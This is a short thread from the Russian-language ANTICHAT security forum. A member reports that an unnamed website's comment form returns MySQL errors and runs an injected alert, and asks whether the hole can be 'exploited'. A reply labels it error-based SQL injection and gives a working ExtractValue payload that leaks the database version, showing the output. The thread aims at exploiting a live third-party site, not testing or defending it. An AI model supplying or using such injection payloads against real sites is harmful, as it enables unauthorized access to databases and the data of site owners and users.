HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 23.03.2020, 11:38
0xd098d0b3d0
Guest
Сообщений: n/a
Провел на форуме:
21406

Репутация: 0
По умолчанию

Если вставить кавычку в комментарий, на сайте

И отправить, то выдает вот это

Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/admin/web//public_html/inc/add_comment.php on line 47

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'asdf asdfas dfad sf' and site_id='0'' at line 1

Причем, если вставить alert, то он выдаст его в отдельном окошке.

Вопрос, можно ли раскрутить, или это просто отображается ошибка
 
Ответить с цитированием

  #2  
Старый 23.03.2020, 15:44
WallHack
Guest
Сообщений: n/a
Провел на форуме:
61136

Репутация: 32
По умолчанию

Это error based

Код:
Code:
fgggggggggggggg' ||(ExtractValue(1,concat(0x3a,(select(version())))))#
Вверху: XPATH syntax error: ':5.5.60-log'
 
Ответить с цитированием

  #3  
Старый 23.03.2020, 20:53
0xd098d0b3d0
Guest
Сообщений: n/a
Провел на форуме:
21406

Репутация: 0
По умолчанию

Цитата:
Сообщение от WallHack  
WallHack said:

Это error based
Код:
Code:
fgggggggggggggg' ||(ExtractValue(1,concat(0x3a,(select(version())))))#
Вверху:
XPATH syntax error: ':5.5.60-log
'
Если не сложно, можно небольшую расшифровочку.

Я так понимаю, что текст до кавычки, это чтобы обойти проверку на длинну комментария, дальше идет ExtractValue, как оно взаимодействует? и зачем решетка в конце строки. Остальное понятно.
 
Ответить с цитированием

  #4  
Старый 24.03.2020, 12:59
kris990
Guest
Сообщений: n/a
Провел на форуме:
5147

Репутация: 0
По умолчанию

 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ